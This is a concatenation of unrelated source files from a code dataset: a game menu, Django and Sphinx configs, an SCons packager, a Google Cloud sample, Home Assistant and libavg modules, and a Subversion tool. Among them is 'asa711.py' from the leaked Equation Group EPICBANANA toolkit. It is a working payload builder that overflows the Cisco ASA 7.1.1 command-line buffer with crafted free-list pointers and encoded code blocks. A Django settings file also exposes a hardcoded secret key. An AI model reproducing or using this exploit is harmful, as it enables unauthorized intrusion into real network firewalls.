os.path.join(CONFIG.system_path, "levels", f)):
coverflow_data.append([])
coverflow_data[-1].append(f)
coverflow_data[-1].append(
join(
CONFIG.system_path,
"levels", f, "screenshot.png"))
except:
#XXX: catch all exceptions: BAD
logging.debug(str(f) +" is not a valid level.")
return coverflow_data
def callback(self, action):
if action is self.player_spinner :
| #get the index of the player
player_number = self.player_spinner.index(action)
self.players[player_number] = action.get_index()
#change the portrait
self.portraits[player_number].setImage(
join(
self.game_data['character_file'][action.get_index()],
"portrait.png"))
if action.text == _("Start"):
i = 0
| for player in self.players:
if player != 0:
i += 1
if i > 1:
return {'goto': 'level'}
if action.text == _('Back'):
return {'goto': 'back'}
|
CARocha/addac_fadcanic | lugar/admin.py | Python | gpl-3.0 | 567 | 0.021164 | from django.contrib import admin
from lugar.models import Departamento, Municipio, Microcuenca, Comunidad
class ComunidadAdmin(admin.ModelAdmin):
list_display = ['nombre', 'municipio']
class DepartamentoAdmin(admin.ModelAdmin):
pass
class MicrocuencaAdmin | (admin.ModelAdmin):
pass
class MunicipioAdmin(admin.ModelAdmin):
list_display = ['nombre', 'departamento']
admin.site.register(Departamento,DepartamentoAdmin )
admin.site.register(Municipio, MunicipioAdmin)
admin.site.register(Microcuenca,MicrocuencaAdmin)
admin.site.register(Comunidad, Co | munidadAdmin)
|
makinacorpus/mapnik2 | scons/scons-local-1.2.0/SCons/Tool/packaging/targz.py | Python | lgpl-2.1 | 1,677 | 0.002385 | """SCons.Tool.Packaging.targz
The targz SRC packager.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__ | revision__ = "src/engine/SCons/Tool/packaging/targz.py 3842 2008/12/20 22:59:52 scons"
from SCons.Tool.packaging import stripinstallbuilder, putintopackageroot
de | f package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Tar']
bld.set_suffix('.tar.gz')
target, source = stripinstallbuilder(target, source, env)
target, source = putintopackageroot(target, source, env, PACKAGEROOT)
return bld(env, target, source, TARFLAGS='-zc')
|
googleapis/python-talent | samples/generated_samples/jobs_v4_generated_company_service_delete_company_sync.py | Python | apache-2.0 | 1,376 | 0.000727 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteCompany
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-talent
# [START jobs_v4_generated_CompanyServic | e_DeleteCompany_sync]
from google.cloud import talent_v4
def sample_delete_company():
# Create a client
client = talent_v4.CompanyServiceClient()
# Initialize request argument(s)
request = talent_v4.DeleteCompanyRequest(
name="name_value | ",
)
# Make the request
client.delete_company(request=request)
# [END jobs_v4_generated_CompanyService_DeleteCompany_sync]
|
bwhite/hadoopy | doc/conf.py | Python | gpl-3.0 | 6,505 | 0.006303 | # -*- coding: utf-8 -*-
#
# Hadoopy documentation build configuration file, created by
# sphinx-quickstart on Sat Jan 15 20:41:41 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('../../hadoopy'))
sys.path.append(os.path.abspath('../../hadoopy/hadoopy/'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.viewcode', 'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Hadoopy'
copyright = u'2012, Brandyn White'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.0.6.0'
# The full version, including alpha/beta/rc tags.
release = '.0.6.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'hadoopy.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Hadoopydoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the do | cument tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Hadoopy.tex', u'Hadoopy Documentation',
u'Brandyn White', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
| #latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
DarthMaulware/EquationGroupLeaks | Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/EPBA/EPICBANANA/versions/asa711.py | Python | unlicense | 2,590 | 0.002317 | from params import *
from util import *
from asa711_loader import *
def payload(params):
block_enc = []
while len(block_enc) == 0:
mask_byte = ord(rand_byte()) # one byte, used as an int
#print "trying to mask data with 0x%02x" % mask_byte
block_enc = prepare_blocks(params, mask_byte,
block1_decoder, cleanup, block_decoder, blocks_table, epba_exit,
free_addrs, block)
if block_enc == False:
print "failed to prepare blocks!"
return ""
# prepare the payload
payload = ""
# drop 460 bytes for overflow to offset 1224 in getline
# sequence is K-Y-Y-Y
# 15 blocks of free memory, 13 for code
payload += ctrl_v_escape("\x01" * 336)
payload += ctrl_v_escape(valid_prev) # new prev
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(free_addrs[0]) # where blob drops
payload += ctrl_v_escape(free_addrs[1]) # first real code drops here
payload += ctrl_v_escape(free_addrs[2])
payload += ctrl_v_escape(free_addrs[3])
payload += ctrl_v_escape(free_addrs[4])
payload += ctrl_v_escape(free_addrs[5])
payload += ctrl_v_escape(free_addrs[6])
payload += ctrl_v_escape(free_addrs[7])
payload += ctrl_v_escape(free_addrs[8])
payload += ctrl_v_escape(free_addrs[9])
payload += ctrl_v_escape(free_addrs[10])
payload += ctrl_v_escape(free_addrs[11])
payload += ctrl_v_escape(free_addrs[12])
payload += ctrl_v_escape(free_addrs[13]) # last real code
payload += ctrl_v_escape(free_addrs[14]) # overwrite the free ptr
payload += ctrl_v_escape("\x01" * 52)
payload += OVERWRITE + KILL + (YANK * 3) + LINEFEED
payload += ctrl_v_escape(block_enc[1]) + LINEFEED
payload += ctrl_v_escape(block_enc[2]) + LINEFEED
payload += ctrl_v_escape(block_enc[3]) + LINEFEED
payload += ctrl_v_escape(block_enc[4]) + LINEFEED
payload += ctrl_v_escape(block_enc[5]) + LINEFEED
payload += ctrl_v_escape(block_enc[6]) + LINEFEED
payload += ctrl_v_escape(block_enc[7]) + LINEFEED
payload += ctrl_v_escape(block_enc[8]) + LINEFEED
payload += ctrl_v_escape(block_enc[9]) + LINEFEED
payload += ctrl_v_escape(block_enc[10]) + LINEFEED
payload += ctrl_v_escape(block_ | enc[11]) + LINEFEED
payload += ctrl_v_escape(block_enc[12]) + LINEFEED
payload += ctrl_v_escape(block_enc[13]) + LINEFEED
payload += ctrl_v_escape(block_enc[14]) + LINEFEED
return(p | ayload)
|
fvioz/hil-sample | main.py | Python | apache-2.0 | 572 | 0.006993 | # -*- coding: utf-8 -*-
from hil import Core
from context import AppContext
from apps.vibration.main import Vibration
from apps.voice.main import Voice
from apps.react.mai | n import React
from apps.sound.main import Sound
from apps.dialog.main import Dialog
class Main:
def __init__(self):
super(Main, self).__init__()
self.components = [Vibration, Voice, React, Sound, Dialog]
self.context = AppContext
def run(self):
self.core = Core( | self.components, self.context)
self.core.start()
if __name__ == "__main__":
main = Main()
main.run()
|
LyndonChin/CatyHIS | CatyHIS/settings.py | Python | mit | 2,157 | 0.000464 | """
Django settings for CatyHIS project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djan | goproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep t | he secret key used in production secret!
SECRET_KEY = 'jh40i$ueqp$s7+@e71)s-&c*ek8vgt9atzdz7un6=r9(9^*5+-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'FormGen',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'CatyHIS.urls'
WSGI_APPLICATION = 'CatyHIS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
RES_DIR = os.path.join(BASE_DIR, 'res')
|
hoodie/libavg | src/samples/abort_gestures.py | Python | lgpl-2.1 | 3,317 | 0.006331 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from libavg import avg, gesture, app
import gestures
RESOLUTION = avg.Point2 | D(800, 600)
nodeList = []
nodesEnabled = True
def abortAll():
for node in nodeList:
node.recognizer.abort()
def switchNodesEnabled():
global nodesEnabled
nodesEnabled = not nodesEnabled
for node in nodeList:
node.recognizer.enable(nodesEnabled)
class TapButton(gestures.TextRect):
def __init__(self, text, **kwargs):
super(TapButton, self).__init__(text, **kwargs)
self.recognizer = gesture.TapRecognizer(node=self,
possibleHandle | r=self._onPossible, detectedHandler=self._onDetected,
failHandler=self._onFail)
def _onPossible(self):
self.rect.fillcolor = "FFFFFF"
def _onDetected(self):
self.rect.fillcolor = "000000"
self.rect.color = "00FF00"
def _onFail(self):
self.rect.fillcolor = "000000"
self.rect.color = "FF0000"
class AbortButton(TapButton):
def __init__(self, text, **kwargs):
super(AbortButton, self).__init__(text, **kwargs)
def _onPossible(self):
super(AbortButton, self)._onPossible()
self.words.color = "000000"
def _onDetected(self):
super(AbortButton, self)._onDetected()
abortAll()
self.words.color = "FFFFFF"
def _onFail(self):
super(AbortButton, self)._onFail()
self.words.color = "FFFFFF"
class EnableButton(TapButton):
def __init__(self, text, **kwargs):
super(EnableButton, self).__init__(text, **kwargs)
self.words.color = "FF0000"
def changeText(self):
if(nodesEnabled):
self.words.text = "Disable all"
self.words.color = "FF0000"
else:
self.words.text = "Enable all"
self.words.color = "00FF00"
def _onDetected(self):
super(EnableButton, self)._onDetected()
switchNodesEnabled()
self.changeText()
class GestureDemoDiv(app.MainDiv):
def onInit(self):
avg.WordsNode(text='''a - abort recognition <br/>
d - enable/disable recognition <br/><br/>
or use the buttons on the right side''',
pos=(20, 510), parent=self)
nodeList.append(gestures.HoldNode(text="HoldRecognizer", pos=(20,20),
parent=self))
nodeList.append(gestures.DragNode(text="DragRecognizer<br/>friction",
pos=(200,20), friction=0.05, parent=self))
nodeList.append(gestures.TransformNode(text="TransformRecognizer",
ignoreRotation=False, ignoreScale=False, pos=(380,20), parent=self))
self.abortButton = AbortButton(text="Abort all", pos = (630, 490), parent=self)
self.enableButton = EnableButton(text="Disable all", pos = (630, 540),
parent=self)
app.keyboardmanager.bindKeyDown(text="a", handler=abortAll,
help="abort recognition")
app.keyboardmanager.bindKeyDown(text="d", handler=self.onEnableKey,
help="Enable/disable recognition")
def onEnableKey(self):
switchNodesEnabled()
self.enableButton.changeText()
if __name__ == '__main__':
app.App().run(GestureDemoDiv(), app_resolution="800,600")
|
leppa/home-assistant | homeassistant/components/neato/camera.py | Python | apache-2.0 | 3,990 | 0.000752 | """Support for loading picture from Neato."""
from datetime import timedelta
import logging
from pybotvac.exceptions import NeatoRobotException
from homeassistant.components.camera import Camera
from .const import (
NEATO_DOMAIN,
NEATO_LOGIN,
NEATO_MAP_DATA,
NEATO_ROBOTS,
SCAN_INTERVAL_MINUTES,
)
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(minutes=SCAN_INTERVAL_MINUTES)
ATTR_GENERATED_AT = "generated_at"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Neato Camera."""
pass
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Neato camera with config entry."""
dev = []
neato = hass.data.get(NEATO_LOGIN)
mapdata = hass.data.get(NEATO_MAP_DATA)
for robot in hass.data[NEATO_ROBOTS]:
if "maps" in robot.traits:
dev.append(NeatoCleaningMap(neato, robot, mapdata))
if not dev:
return
_LOGGER.debug("Adding robots for cleaning maps %s", dev)
async_add_entities(dev, True)
class NeatoCleaningMap(Camera):
"""Neato cleaning map for last clean."""
def __init__(self, neato, r | obot, mapdata):
"""Initialize Neato cleaning map."""
super().__init__ | ()
self.robot = robot
self.neato = neato
self._mapdata = mapdata
self._available = self.neato.logged_in if self.neato is not None else False
self._robot_name = f"{self.robot.name} Cleaning Map"
self._robot_serial = self.robot.serial
self._generated_at = None
self._image_url = None
self._image = None
def camera_image(self):
"""Return image response."""
self.update()
return self._image
def update(self):
"""Check the contents of the map list."""
if self.neato is None:
_LOGGER.error("Error while updating camera")
self._image = None
self._image_url = None
self._available = False
return
_LOGGER.debug("Running camera update")
try:
self.neato.update_robots()
except NeatoRobotException as ex:
if self._available: # Print only once when available
_LOGGER.error("Neato camera connection error: %s", ex)
self._image = None
self._image_url = None
self._available = False
return
image_url = None
map_data = self._mapdata[self._robot_serial]["maps"][0]
image_url = map_data["url"]
if image_url == self._image_url:
_LOGGER.debug("The map image_url is the same as old")
return
try:
image = self.neato.download_map(image_url)
except NeatoRobotException as ex:
if self._available: # Print only once when available
_LOGGER.error("Neato camera connection error: %s", ex)
self._image = None
self._image_url = None
self._available = False
return
self._image = image.read()
self._image_url = image_url
self._generated_at = (map_data["generated_at"].strip("Z")).replace("T", " ")
self._available = True
@property
def name(self):
"""Return the name of this camera."""
return self._robot_name
@property
def unique_id(self):
"""Return unique ID."""
return self._robot_serial
@property
def available(self):
"""Return if the robot is available."""
return self._available
@property
def device_info(self):
"""Device info for neato robot."""
return {"identifiers": {(NEATO_DOMAIN, self._robot_serial)}}
@property
def device_state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = {}
if self._generated_at is not None:
data[ATTR_GENERATED_AT] = self._generated_at
return data
|
bdmod/extreme-subversion | BinarySourcce/subversion-1.6.17/tools/bdb/whatis-rep.py | Python | gpl-2.0 | 1,674 | 0.018519 | #!/usr/bin/env python
#
# Print a description (including data, path, and revision) of the
# specified node reps in a Subversion filesystem. Walks as much of
# the reps table as necessary to locate the data (e.g. does a table
# scan).
# Standard modules
import sys, os, re, codecs
# Local support modules
import skel, svnfs
def main():
progname = os.path.basename(sys.argv[0])
if len(sys.argv) >= 3:
dbhome = os.path.join(sys.argv[1], 'db')
if not os.path.exists(dbhome):
sys.stderr.write("%s: '%s' is not a valid svn repository\n" %
(sys.argv[0], dbhome))
sys.stderr.flush()
sys.exit(1)
rep_ids = sys.argv[2:]
else:
sys.stderr.write("Usage: %s <svn-repository> <rep-id>...\n" % pro | gname)
sys.stderr.flush()
sys.exit(1)
print("%s running on repository '%s'" % (prog | name, dbhome))
print("")
rep_ids = dict.fromkeys(rep_ids)
ctx = svnfs.Ctx(dbhome)
try:
cur = ctx.nodes_db.cursor()
try:
rec = cur.first()
while rec:
if rec[0] != 'next-key':
nid, cid, tid = rec[0].split(".")
nd = skel.Node(rec[1])
if nd.datarep in rep_ids:
rev = skel.Txn(ctx.txns_db[tid]).rev
print("%s: data of '%s%s' in r%s" % (nd.datarep,
nd.createpath, {"dir":'/', "file":''}[nd.kind], rev))
if nd.proprep in rep_ids:
rev = skel.Txn(ctx.txns_db[tid]).rev
print("%s: properties of '%s%s' in r%s" % (nd.datarep,
nd.createpath, {"dir":'/', "file":''}[nd.kind], rev))
rec = cur.next()
finally:
cur.close()
finally:
ctx.close()
if __name__ == '__main__':
main()
|
NaN-tic/nereid | nereid/sessions.py | Python | gpl-3.0 | 3,596 | 0.000556 | #This file is part of Tryton & Nereid. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
from datetime import datetime # noqa
from flask.sessions import SessionInterface, SessionMixin
from werkzeug.contrib.sessions import Session as SessionBase, SessionStore
from flask.globals import current_app
class Session(SessionBase, SessionMixin):
"Nereid Default Session Object"
class NullSession(Session):
"""
Class used to generate nicer error messages if sessions are not
available. Will still allow read-only access to the empty session
but fail on setting.
"""
def _fail(self, *args, **kwargs):
raise RuntimeError('the | session is unavailable | because no secret '
'key was set. Set the secret_key on the '
'application to something unique and secret.')
__setitem__ = __delitem__ = clear = pop = popitem = \
update = setdefault = _fail
del _fail
class MemcachedSessionStore(SessionStore):
"""
Session store that stores session on memcached
:param session_class: The session class to use.
Defaults to :class:`Session`.
"""
def __init__(self, session_class=Session):
SessionStore.__init__(self, session_class)
def save(self, session):
"""
Updates the session
"""
current_app.cache.set(
session.sid, dict(session), 30 * 24 * 60 * 60
)
def delete(self, session):
"""
Deletes the session
"""
current_app.cache.delete(session.sid)
def get(self, sid):
"""
Returns session
"""
if not self.is_valid_key(sid):
return self.new()
session_data = current_app.cache.get(sid)
if session_data is None:
session_data = {}
return self.session_class(session_data, sid, False)
def list(self):
"""
Lists all sessions in the store
"""
raise Exception("Not implemented yet")
class NereidSessionInterface(SessionInterface):
"""Session Management Class"""
session_store = MemcachedSessionStore()
null_session_class = NullSession
def open_session(self, app, request):
"""
Creates or opens a new session.
:param request: an instance of :attr:`request_class`.
"""
sid = request.cookies.get(app.session_cookie_name, None)
if sid:
return self.session_store.get(sid)
else:
return self.session_store.new()
def save_session(self, app, session, response):
"""
Saves the session if it needs updates. For the default
implementation, check :meth:`open_session`.
:param session: the session to be saved
:param response: an instance of :attr:`response_class`
"""
if session.should_save:
self.session_store.save(session)
expires = self.get_expiration_time(app, session)
domain = self.get_cookie_domain(app)
from nereid.globals import request
sid = request.cookies.get(app.session_cookie_name, None)
if session.sid != sid:
# The only information in the session is the sid, and the
# only reason why a cookie should be set again is if that
# has changed
response.set_cookie(
app.session_cookie_name, session.sid,
expires=expires, httponly=False, domain=domain
)
|
ntucker/django-user-accounts | account/auth_backends.py | Python | mit | 2,826 | 0.004954 | from __future__ import unicode_literals
import re
from django.db.models import Q
from django.contrib.auth import get_user_model
from django.contrib.auth.backends import ModelBackend
from account.models import EmailAddress
from account.utils import get_user_lookup_kwargs
email_re = re.compile(
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*" # dot-atom
# quoted-string, see also http://tools.ietf.org/html/rfc2822#section-3.2.5
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-\011\013\014\016-\177])*"'
r')@((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)$)' # domain
r'|\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$', re.IGNORECASE) # literal form, ipv4 address (SMTP 4.1.3)
class UsernameAuthenticationBackend(ModelBackend):
def authenticate(self, **credentials):
User = get_user_model()
lookup_kwargs = get_user_lookup_kwargs({
"{username}__iexact": credentials["username"]
})
try:
| user = User.objects.get(**lookup_kwargs)
except (User.DoesNotExist, KeyError):
return None
else:
try:
if user.check_password(credentials["password"]):
return user
except KeyError:
return None
class EmailAuthenticationBackend(ModelBackend):
def authenticate(self, **credentials):
qs = EmailAddress.objects.filter(Q(primary=True) | Q(verified=True))
try:
e | mail_address = qs.get(email__iexact=credentials["username"])
except (EmailAddress.DoesNotExist, KeyError):
return None
else:
user = email_address.user
try:
if user.check_password(credentials["password"]):
return user
except KeyError:
return None
class HybridAuthenticationBackend(ModelBackend):
"""User can login via email OR username"""
def authenticate(self, **credentials):
User = get_user_model()
if email_re.search(credentials["username"]):
qs = EmailAddress.objects.filter(Q(primary=True) | Q(verified=True))
try: email_address = qs.get(email__iexact=credentials["username"])
except (EmailAddress.DoesNotExist, KeyError): return None
else: user = email_address.user
else:
lookup_kwargs = get_user_lookup_kwargs({
"{username}__iexact": credentials["username"]
})
try: user = User.objects.get(**lookup_kwargs)
except (User.DoesNotExist, KeyError): return None
try:
if user.check_password(credentials["password"]):
return user
except KeyError:
return None
|
sander76/home-assistant | homeassistant/components/light/__init__.py | Python | apache-2.0 | 36,404 | 0.001209 | """Provides functionality to interact with lights."""
from __future__ import annotations
from collections.abc import Iterable
import csv
import dataclasses
from datetime import timedelta
import logging
import os
from typing import cast, final
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
)
from homeassistant.core import HomeAssistant, HomeAssistantError, callback
from homeassistant.helpers import config_validation as cv, entity_registry as er
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import ToggleEntity, ToggleEntityDescription
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.loader import bind_hass
import homeassistant.util.color as color_util
# mypy: allow-untyped-defs, no-check-untyped-defs
DOMAIN = "light"
SCAN_INTERVAL = timedelta(seconds=30)
DATA_PROFILES = "light_profiles"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
# Bitfield of features supported by the light entity
SUPPORT_BRIGHTNESS = 1 # Deprecated, replaced by color modes
SUPPORT_COLOR_TEMP = 2 # Deprecated, replaced by color modes
SUPPORT_EFFECT = 4
SUPPORT_FLASH = 8
SUPPORT_COLOR = 16 # Deprecated, replaced by color modes
SUPPORT_TRANSITION = 32
SUPPORT_WHITE_VALUE = 128 # Deprecated, replaced by color modes
# Color mode of the light
ATTR_COLOR_MODE = "color_mode"
# List of color modes supported by the light
ATTR_SUPPORTED_COLOR_MODES = "supported_color_modes"
# Possible color modes
COLOR_MODE_UNKNOWN = "unknown" # Ambiguous color mode
COLOR_MODE_ONOFF = "onoff" # Must be the only supported mode
COLOR_MODE_BRIGHTNESS = "brightness" # Must be the only supported mode
COLOR_MODE_COLOR_TEMP = "color_temp"
COLOR_MODE_HS = "hs"
COLOR_MODE_XY = "xy"
COLOR_MODE_RGB = "rgb"
COLOR_MODE_RGBW = "rgbw"
COLOR_MODE_RGBWW = "rgbww"
COLOR_MODE_WHITE = "white" # Must *NOT* be the only supported mode
VALID_COLOR_MODES = {
COLOR_MODE_ONOFF,
COLOR_MODE_BRIGHTNESS,
COLOR_MODE_COLOR_TEMP,
COLOR_MODE_HS,
COLOR_MODE_XY,
COLOR_MODE_RGB,
COLOR_MODE_RGBW,
COLOR_MODE_RGBWW,
COLOR_MODE_WHITE,
}
COLOR_MODES_BRIGHTNESS = VALID_COLOR_MODES - {COLOR_MODE_ONOFF}
COLOR_MODES_COLOR = {
COLOR_MODE_HS,
COLOR_MODE_RGB,
COLOR_MODE_RGBW,
COLOR_MODE_RGBWW,
COLOR_MODE_XY,
}
def valid_supported_color_modes(color_modes: Iterable[str]) -> set[str]:
"""Validate the given color modes."""
color_modes = set(color_modes)
if (
not color_modes
or COLOR_MODE_UNKNOWN in color_modes
or (COLOR_MODE_BRIGHTNESS in color_modes and len(color_modes) > 1)
or (COLOR_MODE_ONOFF in color_modes and len(color_modes) > 1)
or (COLOR_MODE_WHITE in color_modes and not color_supported(color_modes))
):
raise vol.Error(f"Invalid supported_color_modes {sorted(color_modes)}")
return color_modes
def brightness_supported(color_modes: Iterable[str] | None) -> bool:
"""Test if brightness is supported."""
if not color_modes:
return False
return any(mode in COLOR_MODES_BRIGHTNESS for mode in color_modes)
def color_supported(color_modes: Iterable[str] | None) -> bool:
"""Test if color is supported."""
if not color_modes:
return False
return any(mode in COLOR_MODES_COLOR for mode in color_modes)
def color_temp_supported(color_modes: Iterable[str] | None) -> bool:
"""Test if color temperature is supported."""
if not color_modes:
return False
return COLOR_MODE_COLOR_TEMP in color_modes
def get_supported_color_modes(hass: HomeAssistant, entity_id: str) -> set | None:
"""Get supported color modes for a light entity.
First try the statemachine, then entity registry.
This is the equivalent of entity helper get_supported_features.
"""
state = hass.states.get(entity_id)
if state:
return state.attributes.get(ATTR_SUPPORTED_COLOR_MODES)
entity_registry = er.async_get(hass)
entry = entity_registry.async_get(entity_id)
if not entry:
raise HomeAssistantError(f"Unknown entity {entity_id}")
